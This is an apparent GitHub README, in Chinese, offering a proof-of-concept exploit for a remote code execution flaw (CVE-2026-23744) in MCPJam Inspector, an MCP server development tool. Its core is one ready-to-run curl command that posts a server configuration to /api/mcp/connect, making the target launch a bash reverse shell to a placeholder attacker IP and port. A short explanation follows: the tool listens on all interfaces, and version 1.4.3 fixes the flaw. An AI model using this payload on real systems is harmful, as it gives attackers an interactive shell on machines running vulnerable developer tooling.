MrR0b0t19/CVE-2026-23744-PoC

# CVE-2026-23744-PoC MCP Server 漏洞的 PoC。 自动化处理正文部分，确保内容正确。 ## 漏洞路径： ``` /api/mcp/connect ``` ## 使用 curl 的方法： ``` curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}' ``` ## 为什么会发生？ MCPJam Inspector 是第一个用于 MCP 服务器的本地开发平台。版本 1.4.2 及之前版本存在远程代码执行（RCE）漏洞，允许攻击者发送一个设计好的 HTTP 请求，激活 MCP 服务器的安装，从而引发 RCE。由于 MCPJam Inspector 默认监听 0.0.0.0 而不是 127.0.0.1，攻击者可以通过简单的 HTTP 请求远程激活 RCE。版本 1.4.3 包含了补丁。

标签：CVE-2026-23744, HTTP攻击, MCPJam Inspector, MCP Server, PoC, RCE, 威胁模拟, 安全响应, 安全更新, 安全测试, 安全漏洞, 安全漏洞修复, 安全补丁, 安全防护, 平台安全, 攻击性安全, 暴力破解, 漏洞分析, 编程工具, 网络安全审计, 自动化攻击, 路径探测, 远程代码执行